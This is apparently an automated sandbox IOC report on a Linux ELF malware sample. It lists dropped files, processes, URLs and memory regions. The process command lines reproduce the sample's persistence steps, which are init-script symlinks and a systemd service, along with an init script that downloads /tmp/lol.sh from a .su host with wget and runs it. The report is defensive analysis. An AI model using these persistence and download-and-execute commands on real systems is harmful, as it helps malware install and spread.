IOC Report
x86_64.nn.elf


Files

File Path | Type | Category | Malicious
x86_64.nn.elf | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header | initial sample | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/x86_64.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -

Processes

Path | Cmdline | Malicious
/tmp/x86_64.nn.elf | /tmp/x86_64.nn.elf | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/systemctl | systemctl enable custom.service | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mybinary | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf" | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/x86_64.nn.elf | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/mkdir | mkdir -p /etc/rc.d | -
/tmp/x86_64.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/tmp/x86_64.nn.elf | - | -
/usr/libexec/gnome-session-binary | - | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | -
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | -
/usr/lib/systemd/systemd | - | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | -

URLs

Name | IP | Malicious
http://pen.gorillafirewall.su/lol.sh | unknown | -
http://pen.gorillafirewall.su/ | unknown | -

Memdumps

Base Address | Regiontype | Protect | Malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
413000 | - | page execute read | malicious
7ffd4fb28000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
514000 | - | page read and write | -
516000 | - | page read and write | -
516000 | - | page read and write | -
514000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
1854000 | - | page read and write | -
516000 | - | page read and write | -
514000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb84000 | - | page execute read | -
516000 | - | page read and write | -
514000 | - | page read and write | -
514000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb84000 | - | page execute read | -
1854000 | - | page read and write | -
1854000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
1854000 | - | page read and write | -
514000 | - | page read and write | -
1854000 | - | page read and write | -
1854000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
1854000 | - | page read and write | -
516000 | - | page read and write | -
1864000 | - | page read and write | -
514000 | - | page read and write | -
1854000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
516000 | - | page read and write | -
516000 | - | page read and write | -
514000 | - | page read and write | -
516000 | - | page read and write | -
1864000 | - | page read and write | -
1854000 | - | page read and write | -
1864000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
516000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb28000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb84000 | - | page execute read | -
516000 | - | page read and write | -
1854000 | - | page read and write | -
7ffd4fb84000 | - | page execute read | -
7ffd4fb28000 | - | page read and write | -
516000 | - | page read and write | -
514000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
7ffd4fb28000 | - | page read and write | -
1854000 | - | page read and write | -
514000 | - | page read and write | -
514000 | - | page read and write | -